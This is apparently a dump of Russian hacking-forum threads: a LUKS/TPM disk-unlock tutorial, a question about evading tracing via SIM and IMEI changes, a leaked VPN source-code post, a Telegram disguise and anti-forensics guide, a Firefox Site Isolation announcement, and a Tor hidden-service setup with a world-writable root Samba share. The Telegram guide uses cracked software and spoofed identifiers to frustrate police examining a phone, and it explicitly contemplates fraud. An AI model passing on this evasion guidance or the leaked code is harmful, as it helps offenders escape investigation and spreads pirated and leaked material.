PCR — это внутренние регистры памяти TPM, в которых в зашифрованном виде содержится вся информация о целостности метрик системы, начиная с загрузки BIOS до завершения работы системы. Информация, содержащаяся в PCR, формирует корень доверия для измерений (RTM). Могут храниться как в энергонезависимой, так и в энергозависимой памяти. Эти регистры сбрасываются при старте и при перезагрузке системы. Спецификация предписывает минимальное количество регистров (16), каждый регистр содержит 160 бит информации. Регистры 0–7 зарезервированы для нужд TPM. Регистры 8–15 доступны для использования операционной системой и приложениями. Изменения значений PCR необратимы, и их значения нельзя записать напрямую, их можно только расширить новыми значениями, которые зависят от предыдущих. Все изменения значений PCR записываются в лог изменений, который хранится в энергозависимой памяти.

Click to expand...

PCR| USE
---|---
PCR0| Core System Firmware executable code (aka Firmware)
PCR1| Core System Firmware data (aka UEFI settings)
PCR2| Extended or pluggable executable code
PCR3| Extended or pluggable firmware data
PCR4| Boot Manager
PCR5| GPT / Partition Table
PCR6| Resume from S4 and S5 Power State Events
PCR7| Secure Boot State
PCR8| Hash of the booted kernel
PCR 9 to 10| Reserved for Future Use
PCR11| BitLocker Access Control
PCR12| Data events and highly volatile events
PCR13| Boot Module Details
PCR14| Boot Authorities
PCR 15 to 23| Reserved for Future Use

Для включения systemd-cryptsetup необходимо добавить в /etc/mkinicpio.conf хуки systemd и sd-encrypt.

Code:Copy to clipboard

HOOKS=(base systemd modconf block keyboard sd-encrypt filesystems fsck) $ mkinicpio -P

Наконец, изменим строку загрузки, добавив параметры rd.luks.name и rd.luks.name.

Code:Copy to clipboard

$ blkid /dev/sda2 /dev/sda2: UUID="e04b5b87-6bfc-4f73-83b0-36f91d52f141" TYPE="crypto_LUKS" PARTLABEL="primary" PARTUUID="136ffe26-5569-4c76-a871-9025ea52dbd8" $ efibootmgr \ --create \ --bootnum=0001 \ --label "Arch Linux" \ --disk /dev/sda \ --part 1 \ --loader /vmlinuz-linux \ --unicode 'rd.luks.name=e04b5b87-6bfc-4f73-83b0-36f91d52f141=cryptroot rd.luks.options=tpm2-device=auto root=/dev/mapper/cryptroot rootflags=subvol=@root rw initrd=\initramfs-linux.img' \ --verbose

Перезагружаемся и проверяем, что все работает как надо.

Для тех, кому systemd-cryptsetup по каким‑то причинам не подходит (например, версия systemd старая или вообще нет systemd), могу порекомендовать фреймворк Clevis. С его помощью можно реализовать следующие сценарии авторазблокировки LUKS:

tpm2 — разблокировка с TPM;

tang — разблокировка с сетевого сервера.

Вот как использовать Сlevis с TPM:

Code:Copy to clipboard

$ clevis luks bind -d /dev/sda2 tpm2 '{"pcr_bank":"sha1","pcr_ids":"0,4"}' Enter existing LUKS password: ***************

Проверяем.

Code:Copy to clipboard

$ sudo clevis luks list -d /dev/sda2 1: tpm2 '{"hash":"sha256","key":"ecc","pcr_bank":"sha1","pcr_ids":"0,4"}

Вариант с сервером tang настраивается не сложнее (разумеется, заранее разворачиваем tang и обеспечиваем сетевую доступность):

Code:Copy to clipboard

$ sudo clevis luks bind -d /dev/sda2 tang '{"url":"http://192.168.88.101:7500"}' The advertisement contains the following signing keys: QjvwIdUeor3gBqxLteIOKvWPRqM Do you wish to trust these keys? [ynYN] y Enter existing LUKS password:

Проверяем.

Code:Copy to clipboard

$ sudo clevis luks list -d /dev/sda2 1: tpm2 '{"hash":"sha256","key":"ecc","pcr_bank":"sha1","pcr_ids":"0,4"}' 2: tang '{"url":"http://192.168.88.101:7500"}'

В заключение темы авторазблокировки стоит упомянуть некоторые ограничения фреймворка Clevis:

Clevis работает только с TPM 2.0; TPM 1.2 не поддерживается.

В Tang не реализован механизм смены ключей.

Для Tang необходима доступность сети на этапе загрузки, поэтому, например, для Wi-Fi-подключения требуется дополнительная настройка адаптера в initrd.

СОЗДАНИЕ КЛЮЧЕЙ ВОССТАНОВЛЕНИЯ

Бэкапы ключей в таком деле, как шифрование, должны быть, об этом знает каждый.

Есть два варианта создания ключей восстановления:

дамп заголовка и мастер‑ключа;

запись пароля восстановления в Active Directory.

Делаем копию мастер-ключа

Сделать резервную копию заголовка и мастер‑ключа можно с помощью хорошо известной нам утилиты cryptsetup. С помощью созданной копии можно будет получить доступ к разделу, не зная пароль, поэтому нас заботливо предупреждают, что хранить ее нужно в секрете!

Code:Copy to clipboard

$ cryptsetup luksDump --dump-master-key /dev/sda2 --master-key-file mk.dump WARNING! ======== The header dump with volume key is sensitive information that allows access to encrypted partition without a passphrase. This dump should be stored encrypted in a safe place. Are you sure? (Type 'yes' in capital letters): YES Enter passphrase for /dev/sda2: LUKS header information for /dev/sda2 Cipher name: aes Cipher mode: xts-plain64 Payload offset: 32768 UUID: e04b5b87-6bfc-4f73-83b0-36f91d52f141 MK bits: 512 Key stored to file mk.dump $ xxd mk.dump 00000000: 1501 eccc 84fd 82f7 f53b 56ae 4ab8 5775 .........;V.J.Wu 00000010: 4968 ea61 8d01 1f29 985e 33af 5537 ba40 Ih.a...).3.U7.@ 00000020: af61 6aa2 b384 afe1 aff6 d4c9 ad95 1d67 .aj............g 00000030: 3a4f d64f 33ea 6f50 0a18 1139 9196 d694 :O.O3.oP...9....

При необходимости можно восстановить заголовок и установить новый пароль.

Code:Copy to clipboard

$ cryptsetup luksAddKey /dev/sda2 --master-key-file mk.dump Enter new passphrase for key slot: ******** Verify passphrase: ********

Добавляем пароль восстановления в Active Directory

Другой интересный способ — это хранение пароля в AD.

Для начала нужно включить нашу Arch Linux в домен. Делать это буду с помощью System Security Services Daemon (SSSD) и realmd.

Устанавливаем sssd обычным способом:

Code:Copy to clipboard

$ pacman -Sy sssd

А realmd ставим из AUR.

Убедимся, что домен доступен.

Code:Copy to clipboard

$ realm discover ad.localdomain ad.localdomain type: kerberos realm-name: AD.LOCALDOMAIN domain-name: ad.localdomain configured: no server-software: active-directory client-software: sssd

Присоединяемся к домену, для этого понадобится учетная запись с правами ввода в домен (для простоты — administrator).

Code:Copy to clipboard

$ realm join ad.localdomain Password for Administrator: ********

Проверяем, что все прошло успешно и мы получили билеты Kerberos:

Code:Copy to clipboard

$ realm list ad.localdomain type: kerberos realm-name: AD.LOCALDOMAIN domain-name: ad.localdomain configured: kerberos-member server-software: active-directory client-software: sssd login-formats: %U@ad.localdomain login-policy: allow-realm-logins $ klist -k Keytab name: FILE:/etc/krb5.keytab KVNO Principal ---- -------------------------------------------------------------------------- 2 ARCH$@AD.LOCALDOMAIN 2 ARCH$@AD.LOCALDOMAIN 2 ARCH$@AD.LOCALDOMAIN 2 host/ARCH@AD.LOCALDOMAIN 2 host/ARCH@AD.LOCALDOMAIN 2 host/ARCH@AD.LOCALDOMAIN 2 RestrictedKrbHost/ARCH@AD.LOCALDOMAIN 2 RestrictedKrbHost/ARCH@AD.LOCALDOMAIN 2 RestrictedKrbHost/ARCH@AD.LOCALDOMAIN

Пароль восстановления будем хранить в учетной записи компьютера: это дочерний объект класса msFVE-RecoveryInformation. Так делает виндовый BitLocker, аналогично поступим и мы.

Записывать пароль в AD буду с помощью скрипта на Python.

Code:Copy to clipboard

$ git clone https://github.com/ambalabanov/lukscrow $ cd lukscrow/ $ pip install -r requirements.txt

Запускаем утилиту, указав необходимые параметры и текущий ключ (пароль):

Code:Copy to clipboard

$ ./lukscrow --luks-device /dev/sda2 --ldap-url "ldap://ad.localdomain" --computers-base-dn "CN=Computers,DC=ad,DC=localdomain" --unlock-key ******** Using Kerberos credential cache /tmp/tmpcsdyn49r Connected to AD as 'u:AD\ARCH$' Generating recovery key... Adding recovery key to LUKS volume... New key added. Storing recovery key in Active Directory Recovery key saved to AD. Remove Kerberos credential cache /tmp/tmpcsdyn49r Removed cache file.

Проверяем в AD, что пароль восстановления успешно записался.

![rp](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2Fea111afe48c5640aae77ae0c239a5215%2F21397%2Frp.png&hash=ee989a5562814fca6650256638837bce)
Ну и напоследок проверяем сам пароль.

Code:Copy to clipboard

$ sudo cryptsetup --test-passphrase luksOpen /dev/sda2 && echo TRUE || echo FALSE Enter passphrase for /dev/sda2: 287781-171655-523297-666928-307170-072073-039516-177220 TRUE

ЗАКЛЮЧЕНИЕ

Итак, мы установили Arch Linux на шифрованный корневой раздел, настроили авторазблокировку при старте и позаботились о резервировании ключей. Надеюсь, для тебя это тоже было увлекательным приключением!

автор balabanov Андрей Балабанов
источник хакер.ру

Так ли безопасны 3G/4G роутеры?

ID: 676533bbb4103b69df371bc4
Thread ID: 51866
Created: 2021-05-17T21:53:53+0000
Last Post: 2021-08-06T10:59:27+0000
Author: anteater42
Replies: 13 Views: 2K

Всем привет,

Есть вопросы по 3g/4g модемам/роутерам с симками.

Я однозначно согласен, что лучше выходить в инет так, а не с домашнего ip.
Какая должна быть цепочка дальше – опустим, чтобы избежать холиваров. У каждого свои требования и верования.

Допустим, что по цепочке проследовали до ip этого самого 3g модема (или подозрения на юзера пали из-за чего-то другого).

Допустим, что местным органам это не интересно, но получить инфу у операторов связи можно получить тем же способом, что и в расследовании известного оппозиционера.

Т.е. это может сделать любой житель планеты за относительно небольшие деньги.
Тогда можно просто триангулировать место где находится модем (если известен ip).
Или узнать девайсы которые находятся рядом с юзером (если юзер под подозрением).

1. Какой смысл менять одну левую симку на другую вообще, если по факту роутер/модем находится в одном и том же месте все время?

И это место – то самое, где обитает юзер этой симки.
Услуги по типу “Вспышка” никто не отменял.

Я сомневаюсь, что многие работают нр из авто, меняя место и одноразовую симку каждый день (неудобно + камеры/регистраторы везде и у всех, и инфа с камер тоже покупается).
Или меняя съемные квартиры раз в неделю/месяц (хотя мб имеет смысл такой вариант, но опять же камеры в домофонах и дворах + вспышка).

(Сюда можно еще добавить, что телефон юзера тоже постоянно где-то рядом с этими левыми симками. Не верю, что он пропадает без связи на 12 часов в сутки. Слишком много вопросов будет у друзей/знакомых.)
А без смены места (пусть и со сменой симок) - триангуляция всё равно выведет на адрес конкретного пользователя.

2. Не понимаю какую проблему решает смена IMEI каждый день при рестарте роутера (как советуют некоторые), при том, что симка меняется раз в неделю?

Имхо, когда одна симка меняет 5-7 девайсов за неделю - это лишь повод вызвать дополнительные подозрения, тк это видно в логах оператора.
Т.е. имхо IMEI нужно менять только одновременно со сменой симки. Иначе это слишком подозрительно.
Обычный человек, возможно, переставляет свою симку в другой телефон 1-2 раза в год, но не более того.

3. Какие преимущества частой смены симок я тут упускаю?

4. Может есть еще векторы атак, которые я не вижу?

5. Или то, что я написал выше, не реализуемо практически атакующим?

6. Или это всё имеет смысл только с направленной антенной (чтобы цепляться к одной станции, а не трем и решить вопрос с триангуляцией)?

Спасибо!

BlackBox Следующий уровень Интернет приватности и безопасности - source code leak

ID: 676533bbb4103b69df371bc7
Thread ID: 51294
Created: 2021-04-30T18:35:02+0000
Last Post: 2021-08-03T13:43:55+0000
Author: R3SET
Replies: 9 Views: 2K

BlackBox Следующий уровень Интернет приватности и безопасности
Исходный код системы и VPN leak by r3set
Сайт: https://bbox.wtf/
Скачать:

You must have at least 5 reaction(s) to view the content.

Прокачиваем анонимность в Телеграм

ID: 676533bbb4103b69df371bcf
Thread ID: 51742
Created: 2021-05-13T22:17:15+0000
Last Post: 2021-07-30T08:07:28+0000
Author: PySt0tA
Replies: 8 Views: 2K

Перед началом статьи, хотел бы прояснить ситуацию касательно того, что выкладываю статьи в телеграм... Мне давно говорили чтобы я про неё забыл) Просто я коплю репу. В телеге сидят очень много людей, с которыми можно двигаться и зарабатывать. К сожалению, я ещё не набрался не обрел близких контактов, с которыми могу плавно перейти в Жабу, или Tor форумы. Так что старички, извиняйте, хеххе

Сразу к делу

Сейчас я покажу, как подменить железо, заблокировать телеграму доступ к интернету, если не включен ВПН, а так же как создать видимость, что ваша приложуха это обычный калькулятор. Ну вообще, я покажу куда больше плюшек) Но об этом чуть позже.

Для начала скачиваем одну охуенную приложу, под названием App Cloner, скачать можно нажав сюда.

̶С̶р̶а̶з̶у̶ ̶х̶о̶ч̶у̶ ̶с̶к̶а̶з̶а̶т̶ь̶,̶ ̶и̶д̶и̶т̶е̶ ̶с̶о̶ ̶с̶в̶о̶и̶м̶и̶ ̶а̶й̶ф̶о̶н̶а̶м̶и̶ ̶н̶а̶х̶у̶й̶

Маскировка программы

После того как мы её скачали, берём apk файл нашей телеги, и закидываем в App Cloner.

После того как мы закинули файл, приступаем к его модификации

после чего заменяем нашу иконку на новую

Теперь переходим в параметры конфиденциальности:

и включаем фальшивый калькулятор

Теперь переходим к скрытию своих данных:

при замене MAC, IMEI иIMSI ставить "случайный" ибо пользовательский стоит бабки. Мы и так тут кряк юзаем, этому должны быть рады))

включаем все те функции, что на скринах выше. Думаю все понимаю что такое MAC адрес и IMEI. Если нет, то подскажу. Это индивидуальные индификаторы, которые каждому устройству присваиваются свои. Если программа спалит MAC адрес Wi-Fi, то впринципе возможно вычислить место жительства человека. А если палить MAC устройства, то вы как бы показываете им, что именно этот индивидуальный набор символов принадлежит вашему устройству. И когда к вам придут и будут сверять mac адрес который использовался в месседжере и какой у вас в действительности, они поймут что они идентичны. А это считай чистое подтверждение того, что сидели именно с этого телефона в телеграме.

IMEI - это ещё одна х#йня, которая может отслеживать ваше местоположение. Только бл#ть IMEI может отслеживать ваши перемещения. Если вы сначала были в магазине, а потом поехали в зоопарк, то это всё можно отследить. Каким образом? Да таким, что при подключении сим карты к вышке, она узнает ваш IMEI. И условно, если гос. органы его знают, они могут пробить к каким вышкам сотовой связи подключалось ваше устройство.

Чтобы вы понимали пиздец происходящего)))

Вообще, анонимности не может существовать впринципе, потому что если есть способ подключения, значит есть нить, вы можете просто эту нить запутывать, но если кому-то необходимо, то её спокойно распутают). Но есть и хорошие новости) Найти нехуй делать, а доказать труднее)) И в нашем случае, мы пытаемся подменить mac, imei, сборку устройства, чтобы когда приходилось предоставлять пруфы, они понимали, что придется поебаться. Ведь у кого-то есть данные того, что произведение мошеннических действий происходило с Windows 10 и твоего айпишника, а в реальности у тебя вообще Linux. А Wi-Fi беспарольный. Всё. Подключение к моей сети мог совершить кто угодно, компа на винде нету впринципе.))

Место хранения данных

щас будет кое-что довольно интересное)

Телеграм по умолчанию хранит все файлы кэша в папке "Telegram". Можете сами войти в файловый менеджер и увидеть, что такая папка существует. Или просто зайдите в свою галерею и убедитесь что все ваши сохраненки в папке "Telegram". Если мы замаскируем телеграм под видом калькулятора, то мы палимся как минимум потому что можно просто зайти в галерею и убедится что есть фотки с папки телеграма, или просто в файловом менеджере можно найти эту папку. Значит нам нужно впринципе спрятать эту папку. Если мы её переименуем на "майнкрафт", в галерее фотки то все равно будут с телеграма)). Поэтому мы делаем такую штуку:

После проделанных манипуляций, мы переадресовали хранилище в скрытую папку. А скрытая она потому что прописал путь через точку. Если папка начинается с точки, она по умолчанию прячется. Таким образом, фотки не палятся в галерее, а обычный файловый менеджер не будет их отображать, если не включить функцию "показать скрытые папки".

как нас видят все файловые менеджеры:

как на самом деле:

Изменяем версию программы

вбиваем в поиске слово "имя" и выбираем варианткоторый я подсветил звездочкой

меняем версию на 1.0.0

зачем мы это делали? Всё просто. Если человек войдёт в настройки устройства и увидит что версия калькулятора 7.7, он поймет, что это какая-то х#йня. Ибо калькулятор выпускают в телефоне по дефулту и никаких обновлений до версии 7.2, 7.7 не происходит. Поэтому мы визуально должны сами это всё подменить.

Изменяем пользовательское имя пакета

переходим в параметры клонирования

заменяем на что-то другое

пользовательское имя пакета у каждого приложения своё. Если переименовать папку хранения файлов, имя пакета приложения, останется неизменным. Поэтому его мы тоже заменяем.

Удаляем водяной знак

прямо в этой же вкладке включить функцию удаления водяных знаков. Ибо если не отключить, каждый запуск программы снизу будет подсвечиваться на пару секунд водяной знак App Cloner.
Впринципе всё. этого хватит для того, чтобы замаскировать программу. Но если вам нужно нечто большее, то можете продолжить читать, как можно настроить для большей приватности. Ведь у нас осталось одна огромная загвостка. Это то, что эти скрытые папки найти нехуй делать, как и переименованную папку в android/data. А в этих папках хранится весь наш кэш. Поэтому оттуда можно вытянуть все голосовые сообщения, фотографии, документы и т.д.

Первый способ скрытия кэша

Для начала, устанавливаем наш клон, со всем нашими функциями выше. Открываем, авторизируемся в аккаунт и выходим. Это необходимо для того, чтобы создались необходимые папки, которые мы потом будем каждый раз очищать. Когда вышли с телеграма, возвращаемся в App Cloner в "недавние клоны" (что-то типо того) и там будет наш телеграм. Нажимаем на него и продолжаем модификацию

Очищаем кэш после выхода из программы

это необходимо если нашу поддельную папку обнаружили, с неё не выгрузили все кэшированные фотографии, песни и т.д.

Но если по факту, я тестировал данную функцию и вообще не понимаю, что она там очищает)). Ибо после время провождения в телеграме, в папках сохраняются все фотографии и документы. Поэтому мы вдобавок, сделаем очистку файлов и каталогов. Ниже инструкция:

возвращаемся в самый вверх и идём таким же образом в путь Android/data/com.minecraft

жмём "ок"

Но как всегда, анонимность неудобна. При каждом выходе с программы, все ваши песни, фотографии, переписки которые раньше кэшировались, вы могли спокойно без интернета смотреть, ибо они сохранялись в устройстве. А тут каждый выход будет всё это стираться. Естественно неудобно, зато при попытке вытащить что- либо с кэша без оборудования и специализированного ПО, ничего не выйдет . Но опять же, даже удаленные файлы можно вытянуть.) Из-за чего, какую-то часть кэша, могут восстановить, если очень сильно захотят.

2 способ

Шифруем устройство

Прошлый метод был ещё полезен в том случае, если у вас не зашифрованный телефон и не стоит пароль для входа в телефон. Но если мы зашифруем устройство и запретим доступ по отладке по usb, то можно вообще не беспокоится о кэше, потому что он в любом случае находится в зашифрованном виде. Если у вас современный телефон, есть большая вероятность того, что он уже зашифрован. Разработчики делают это для того, чтобы при потере телефона, злоумышленники не смоги получить доступ к телефону. Так же проясню для тех кто не знает, что такое отладка по USB.

Если условно, ваш телефон стоит под паролем, но включена отладка по USB, то человек может подключить телефон к компьютеру и получить доступ к вашему хранилищу. По умолчанию, эта функция отключена. Но если вы что-либо перекидывали с телефона на комп, скорее всего вы включали отладку. Поэтому её обязательно надо выключить. Но если у вас вдруг отключено шифрование данных, то эта отладка не спасёт. Даже без неё можно получить доступ к хранилищу, потому что он в открытом виде, на зашифровано.

А вот если ваш телефон зашифрован, то ничего не получится вытянуть с телефона. Но бл#ть, если у вас зашифрованный телефон с включенной откладкой, то человек просто подключает телефон к компу и всё.

Шифрованный телефон с включенной отладкой бесполезен

Click to expand...

На каждом устройстве, все настройки выглядят по разному, но суть идентична. Повторяем за тем что ниже:

Если вы хотите быть приватны для телеграма

Бывает, хочется чтобы телеграм ничего не знал о вашей личности. Если вы из числа этих людей, то можем сделать ещё такую штуку:

Это нам поможет не палить свой айпи. Если ВПН не включен, телеграм отключается от сети.

Блокируем доступ к хранилищу

Я не думаю что стоит описывать каждое действие, ибо на скрине всё описанно) Ну всё же, при включении функции, телеграм имеет доступ к хранилищу. Для сохранения кэша, скачивания чего-либо. Но не имеет доступа к вашим фотографиям, видео, музыке, документам и т.д. У метода есть подводные камни. Вы тоже не сможете отправлять фотографии кому-либо. Потому что для отправки необходим доступ к мультимедиа. Ну думаю если вам действительно есть что скрывать от телеграма (допустим фотографии с вашим лицом), то стоит её включить.

Итог

У нас вышла приватная приложуха, под видом калькулятора

Но есть и ахиллесова пята...

это всё и палит. Ну вообще, я как-нибудь попробую сделать код, где будет обычный калькулятор, но при вводе секретного кода, будет перенаправление на другое приложение (Условно замаскированная игра). Таким образом вес калькулятора будет самый обычный, за счет того что будет идти обращение на запуск в другой программы

тут ваши последние переписки

Вопросы:

Если я установлю этот мод, у меня будет 2 калькулятора. Тогда вся суть теряется. В чём смысл?

Ну да, это так. Но у меня есть рут права. Я удалил системный калькулятор, поэтому у меня лишь один калькулятор. Если у вас нету рут прав, то "спрячьте" обычный калькулятор. На современных телефонах, в параметрах безопасности, можно скрыть приложения.) И они не будут отображаться нигде. У каждого бренда телефонов, это делается по-своему. Гуглите.

Если можно как ты пишешь, просто "спрятать" приложение, зачем заниматься этой х#йней?

Потому что как минимум, спрятанная программа не подменяет железо. А как максимум, спрятанное приложение не переадресует и не скрывает папки. А это просто полнейший тупизм. Программа спрятана, просто заходишь в файловый менеджер и открываешь папку "Telegram" и смотришь все фотографии, голосовые, видео, музыку и документы. Вот тебе и спятана)

Ты показал проблемные вещи у этого способа. Они ведь критические. Нахуй использовать метод, который спалить нехуй делать?

Да, есть такое) Размер калькулятора всё говорит за него. А так же прятать программу под калькулятор это уже довольно попсово, поэтому впервую очередь будут как раз её и смотреть. Нооо.. Нужно же ещё код ввести верный, а так же найти файлы кэша, которые довольно необычно спрятаны. Но если смотреть впринципе, этот метод полная х#йня, если будет происходить экспертиза устройства. Как и все впринципе методы будут х#йня, если будет экспертиза. Потому что невозможно спрятать в карман конфету, чтобы лазя в кармане её не нашли)). Метод рассчитан на полицейских, МВДшников самых обычных и прочих людей, которые впринципе не понимают как и что там можно подменять. Ну или же, если кто-то получил доступ к телефону, но не обладает длительным количеством времени, тоже покатит. Если вы включили автоудаление кэша, то вообще шикарно. Ибо без специализированного ПО у них ничего не получится восстановить. Просто поймите, сейчас даже к шифрованным телефонам можно получить доступ, при наличии оборудования. Если интересно узнать что они впринципе для этого делают, вот смотрите по ссылке: [https://forklog.com/moj-mobilnyj- te...ptovalyutnyj-koshelek-i-druguyu-informatsiyu/](https://forklog.com/moj- mobilnyj-telefon-hotyat-dosmotret-kak-zashhitit-kriptovalyutnyj-koshelek-i- druguyu-informatsiyu/)

Советы:

Если вы используете в качестве доступа к телефону FaceID или датчик отпечатка пальцев, настоятельно рекомендуется сменить его на графический ключ или обычный PIN. Потому что если к вам придут, не много труда необходимо, чтобы ваше ебло к камере подставить. Или взять ваш палец. А графический ключ и никто кроме вас его ввести не сможет.

Если вы думаете повторить всё что я описал выше, настоятельно рекомендую оригинальный телеграм оставить. В него войдите с белого, обычного аккаунта. Так будет намного лучше потому что вы отведете глаза от того, что есть где-то подвох. Ибо если и начали что-то осматривать, значит не просто так. И то, что вы не имеете приложения "Telegram" даст повод изучать вас более глубоко. А так, они видят телегу, заходят, понимают что ничего там нету и уже как-то остынут искать второй клон. Возможно, просто подумают что на этом телефоне его нету.))

Советую повторить всё тоже самое, но с маскировкой под игру. Так будет меньше подозрений, потому что игра может весить больше 100мб. А так же, она вызывает меньше интересов, потому что калькулятор уже давно используют в качестве маскировки. И для полной маскировки, можно делать папки хранения кэша, идентичные под названием игры. Так будет более правдоподобно.

На этом всё. Наверное где-то были допущены ошибки, пишите в комменты, буду рад)

Introducing Site Isolation in Firefox

ID: 676533bbb4103b69df371bd2
Thread ID: 54477
Created: 2021-07-27T11:41:40+0000
Last Post: 2021-07-27T11:41:40+0000
Author: hash_d3m0n
Prefix: Статья
Replies: 0 Views: 2K

When two major vulnerabilities known as Meltdown and Spectre were disclosed by security researchers in early 2018, Firefox promptly added security mitigations to keep you safe. Going forward, however, it was clear that with the evolving techniques of malicious actors on the web, we needed to redesign Firefox to mitigate future variations of such vulnerabilities and to keep you safe when browsing the web!

We are excited to announce that Firefox’ new Site Isolation architecture is coming together. This fundamental redesign of Firefox’ Security architecture extends current security mechanisms by creating operating system process-level boundaries for all sites loaded in Firefox for Desktop. Isolating each site into a separate operating system process makes it even harder for malicious sites to read another site’s secret or private data.

We are currently finalizing Firefox’s Site Isolation feature by allowing a subset of users to benefit from this new security architecture on our Nightly and Beta channels and plan a roll out to more of our users later this year. If you are as excited about it as we are and would like to try it out, follow these steps:

? To enable Site Isolation on Firefox Nightly:

1.) Navigate to about:preferences#experimental

2.) Check the “Fission (Site Isolation)” checkbox to enable.

3.) Restart Firefox.

? To enable Site Isolation on Firefox Beta or Release:

1.) Navigate to about:config.

2.) Set fission.autostart pref to true.

3.) Restart Firefox.

With this monumental change of secure browser design, users of Firefox Desktop benefit from protections against future variants of Spectre, resulting in an even safer browsing experience. If you aren’t a Firefox user yet, you can download the latest version here and if you want to know all the technical details about Firefox’ new security architecture, you can read it here.

blog.mozilla.org/security/2021/05/18/introducing-site-isolation-in-firefox/

Поднимаем ноду TOR

ID: 676533bbb4103b69df371bd3
Thread ID: 54328
Created: 2021-07-23T15:40:48+0000
Last Post: 2021-07-23T19:55:07+0000
Author: Tubu
Prefix: Статья
Replies: 4 Views: 2K

1. Скачиваем последнюю версию Vidalia bundle
Vidalia+Proxifier.
2. Устанавливаем Vidalia, запускаем.
3. Жмём коннект, значок должен загореться зелёным. Если видалия запускается без проблем, отключаемся, идём дальше.

4. Заходим в Settings, потом в Advanced

5. Смотрим локальный ip и порт. По дефолту он должен совпадать.
6. Прописываем локальный ip и незанятый порт 9050, в proxifier, рекомендую как на картинке.
7. Заходим на whoer.net
Если анонимайзер показывает что вы используете TOR, значит всё окей.

Развиваем .onion сети - запускаем WEB сайт и Tox ноду

Запускаем Web сайт.
Для вебсайта нам потребуется:

Tor Relay Bundle для Windows, или Tor Server для Linux (описывать установку не буду здесь, т.к навалом инструкций в инете, все они рабочие)

Отдельная машина сервер, виртуальная или реальная - не важно.

Все делаем от root!
Итак, после настройки Tor Server мы будем иметь частный IP адрес вида 1.1.1.1 с control port 9050(по умолчанию), эти настройки мы можем поменять в файле /torrc для linux и windows.

Приступаем к настройке сервера нашего WEB сайта.
Допустим мы выбрали движок, скачали его и имеем в наличии папку upload.
На сервер устанавливаем DEBIAN 7, как самый стабильный дистрибутив.
После установки добавляем следующие репозитории в sources.list:
Код:
deb http://ftp.ru.debian.org/debian testing main contrib non-free
deb-src http://ftp.ru.debian.org/debian testing main contrib non-free

deb http://ftp.debian.org/debian/ jessie-updates main contrib non-free
deb-src http://ftp.debian.org/debian/ jessie-updates main contrib non-free

deb http://security.debian.org/ jessie/updates main contrib non-free
deb-src http://security.debian.org/ jessie/updates main contrib non-free

#Oracle VM VirtualBox
deb http://download.virtualbox.org/virtualbox/debian wheezy contrib non-free
Выgолняем apt-get update, затем apt-get upgrade.
Устанавливаем все предложенные обновления.
Устанавливаем samba для удобства редактирования\закачки, рабочий конфиг samba:
Код:
[global]
workgroup = WORKGROUP
netbios name = НАЗВАНИЕ
server string = ОТОБРАЖЕНИЕ В ПАПКАХ
wins support = no
dns proxy = no
bind interfaces only = yes
log file = /var/log/samba/log.%m
max log size = 1000
syslog only = yes
syslog = 0
panic action = /usr/share/samba/panic-action %d
server role = standalone server
passdb backend = tdbsam
obey pam restrictions = yes
unix password sync = yes
passwd program = /usr/bin/passwd %u
passwd chat = Enter\snew\s\spassword:* %n\n Retype\snew\s\spassword:* %n\n password\supdated\ssuccessfully .
pam password change = yes
map to guest = bad user
; logon path = \%N\profiles%U

logon path = \%N%U\profile

; logon drive = H:

logon home = \%N%U

; logon script = logon.cmd
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u
; add machine script = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u
; add group script = /usr/sbin/addgroup --force-badname %g
; include = /home/samba/etc/smb.conf.%m
; template shell = /bin/bash
; usershare max shares = 100
usershare allow guests = yes
security = share
local master = Yes

#======================= Share Definitions =======================

[НАЗВАНИЕ СЕТЕВОЙ ПАПКИ]
path = /
comment = КОММЕНТАРИИ
browseable = yes
writeable = yes
create mask = 0777
directory mask = 0777
public = yes
force user = root
Неограниченные права на всю файловую систему, важно после завершения работ отключите шару просто добавляя # в начале всех строк после share definition!

Перезагружаемся, устанавливаем fail2ban, openssh-server.
Подключаемся по ssh и устанавливаем phpmyadmin, вводим пароль к базам mysql phpmyadmin, с ее помощью мы будем работать с базами данных mysql.
После установки вы можете зайти по адресу http://ip сервера/phpmyadmin
Создаем пустую базу с кодировкой (обычно) UTF8 General.
Импортируем базу mysql.sql от нашего движка сайта (если требуется), затем заливаем upload в /var/www.
Путь до корня сайта указывается в файле /etc/apache2/apache2.conf или /etc/nginx/nginx.conf
Строчки такого вида :
Код:
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted

Ок, мы залили сайт на сервер, теперь перезапускаем apache2/nginx командой service %имя% restart.
Если все в порядке, идем дальше, если нет, то смотрим конфиг сервера или правильно ли мы скопировали корень движка, в www должен лежать файл index.xxx.

Теперь идем в папку /etc/nginx или apache2/sites-enabled и sites-available
Смотрим файл default. В нем мы видим по какому порту доступен/включен наш сайт, настраиваем примерно вот так:
Код:
<VirtualHost *:НОМЕР ПОРТА НА ВАШЕМ СЕРВЕРЕ>
ServerName localhost

ServerAdmin webmaster@localhost
DocumentRoot /var/www/
DirectoryIndex index.php #файл вашего сайта, html или php
Номер порта выставляем любой, но только не 80, например 2533. На этом порте ваш сервер будет принимать запросы и отдавать. Для onion сети безопасность важней всего, чтобы защитится от атаки, необходимо иметь непубличный порт.
Содержимое этого файла должно быть одинаковым в обоих папках.
При использовании apache2, нужно также сменить порт в файле /etc/apache2/ports.conf вот так:
Код:

If you just change the port or add more ports here, you will likely also

have to change the VirtualHost statement in

/etc/apache2/sites-enabled/000-default.conf

Listen НОМЕР ПОРТА
Listen 443 Listen 443
vim: syntax=apache ts=4 sw=4 sts=4 sr noet

Теперь направляемся на наш Tor Bridge сервер и настраиваем файл torrc.
Вот так:
Код:
#Дописываем в конец файла
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 IP WEB СЕРВЕРА:УКАЗАННЫЙ ПОРТ В КОНФИГЕ
Перезапускаем Tor - в случае Linux /etc/init.d/tor restart
Мы перенаправили запросы с нашей ноды на ip адрес и порт нашего сервера, автоматически генерируется адрес в файле hostname.
Код:
[root@GW ~]# cat /var/lib/tor/hidden_service/hostname
aypeabqhmnx5lubh.onion
В итоге сгенерировался адрес нашего hidden service - aypeabqhmnx5lubh.onion
Заходим по этому адрес через Tor Browser и видим наш сайт.

Настраиваем Tox Bootstrap.

